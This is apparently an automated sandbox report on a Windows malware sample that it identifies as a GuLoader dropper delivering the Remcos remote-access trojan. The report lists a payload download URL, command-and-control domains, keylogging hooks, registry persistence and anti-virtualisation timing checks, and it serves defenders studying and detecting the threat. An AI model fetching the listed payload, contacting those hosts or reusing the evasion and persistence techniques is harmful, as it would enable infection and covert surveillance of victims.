HTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: teldrum.ro
Source: global traffic	DNS traffic detected: DNS query: linktreewealth.zapto.org
Source: global traffic	DNS traffic detected: DNS query: linktreewealthy.zapto.org

Source: x6yDsHJ9tr.exe, 00000000.00000002.3372027663.000000000040A000.00000004.00000001.01000000.00000003.sdmp, x6yDsHJ9tr.exe, 00000000.00000000.2092615557.000000000040A000.00000008.00000001.01000000.00000003.sdmp, x6yDsHJ9tr.exe, 00000004.00000000.3369669549.000000000040A000.00000008.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
Source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp	String found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/&
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.bin0
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573513984.0000000006A90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binTt
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binZ

Source: unknown	Network traffic detected: HTTP traffic on port 49978 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49978

Source: unknown

HTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:49978 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\x6yDsHJ9tr.exe

Jump to behavior

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Code function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405846

E-Banking Fraud

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x6yDsHJ9tr.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Code function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403645

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Code function: 0_2_00406DA0		0_2_00406DA0
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Code function: 0_2_73471BFF		0_2_73471BFF

Source: x6yDsHJ9tr.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/10@17/2

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

0_2_00403645

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Code function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404AF2

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Code function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,

0_2_004021AF

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

File created: C:\Users\user\eftermodnendes

Jump to behavior

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Mutant created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

File created: C:\Users\user\AppData\Local\Temp\nsuD808.tmp

Jump to behavior

Source: x6yDsHJ9tr.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: x6yDsHJ9tr.exe	Virustotal: Detection: 34%
Source: x6yDsHJ9tr.exe	ReversingLabs: Detection: 26%

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

File read: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\x6yDsHJ9tr.exe "C:\Users\user\Desktop\x6yDsHJ9tr.exe"
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Process created: C:\Users\user\Desktop\x6yDsHJ9tr.exe "C:\Users\user\Desktop\x6yDsHJ9tr.exe"
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Process created: C:\Users\user\Desktop\x6yDsHJ9tr.exe "C:\Users\user\Desktop\x6yDsHJ9tr.exe"	Jump to behavior

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Section loaded: winmm.dll	Jump to behavior

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

File written: C:\Users\user\AppData\Local\Temp\Setup.ini

Jump to behavior

Source: x6yDsHJ9tr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: mshtml.pdbUGP source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.3373583635.0000000006C89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Code function: 0_2_73471BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73471BFF

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Code function: 0_2_734730C0 push eax; ret

0_2_734730EE

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	File created: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	File created: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat			Jump to dropped file

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

File created: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat

Jump to dropped file

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished	Jump to behavior

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	API/Special instruction interceptor: Address: 733EFF8
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	API/Special instruction interceptor: Address: 5A4EFF8

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	RDTSC instruction interceptor: First address: 730446B second address: 730446B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 30F9070Dh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F98ED042D92h 0x0000000c test ebx, edx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	RDTSC instruction interceptor: First address: 5A1446B second address: 5A1446B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 30F9070Dh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F98EC747692h 0x0000000c test ebx, edx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Window / User API: threadDelayed 3394	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Window / User API: threadDelayed 1035	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Window / User API: threadDelayed 4601	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Window / User API: foregroundWindowGot 1756	Jump to behavior

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe TID: 4836	Thread sleep count: 3394 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe TID: 6648	Thread sleep count: 1035 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe TID: 6648	Thread sleep time: -3105000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe TID: 6648	Thread sleep count: 4601 > 30	Jump to behavior
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe TID: 6648	Thread sleep time: -13803000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Thread sleep count: Count: 3394 delay: -5

Jump to behavior

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Code function: 0_2_004069DF FindFirstFileW,FindClose,	0_2_004069DF
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Code function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D8E
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhN

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	API call chain: ExitProcess graph end node			graph_0-4369
Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe	API call chain: ExitProcess graph end node			graph_0-4597

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

0_2_00403645

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Code function: 0_2_73471BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_73471BFF

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Process created: C:\Users\user\Desktop\x6yDsHJ9tr.exe "C:\Users\user\Desktop\x6yDsHJ9tr.exe"

Jump to behavior

Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerIG\
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerM
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager7
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerT
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager@
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [Program Manager]

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

0_2_00403645

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x6yDsHJ9tr.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: x6yDsHJ9tr.exe PID: 5064, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Masquerading	11 Input Capture	31 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	12 Process Injection	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	12 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
x6yDsHJ9tr.exe	35%	Virustotal		Browse
x6yDsHJ9tr.exe	26%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat	26%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://teldrum.ro/NJrdZqNcCtz102.binTt	0%	Avira URL Cloud	safe
https://teldrum.ro/NJrdZqNcCtz102.bin	0%	Avira URL Cloud	safe
linktreewealth.zapto.org	0%	Avira URL Cloud	safe
https://teldrum.ro/NJrdZqNcCtz102.bin0	0%	Avira URL Cloud	safe
https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin	0%	Avira URL Cloud	safe
https://teldrum.ro/	0%	Avira URL Cloud	safe
https://teldrum.ro/NJrdZqNcCtz102.binZ	0%	Avira URL Cloud	safe
linktreewealthy.zapto.org	0%	Avira URL Cloud	safe
https://teldrum.ro/&	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
linktreewealth.zapto.org	43.226.229.209	true	true	unknown
teldrum.ro	109.99.162.14	true	false	unknown
linktreewealthy.zapto.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://teldrum.ro/NJrdZqNcCtz102.bin	false	Avira URL Cloud: safe	unknown
linktreewealth.zapto.org	true	Avira URL Cloud: safe	unknown
linktreewealthy.zapto.org	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://teldrum.ro/NJrdZqNcCtz102.bin0	x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://teldrum.ro/NJrdZqNcCtz102.binTt	x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	x6yDsHJ9tr.exe, 00000004.00000001.3371870256.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin	x6yDsHJ9tr.exe, 00000004.00000002.4573513984.0000000006A90000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	x6yDsHJ9tr.exe, 00000004.00000001.3371870256.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
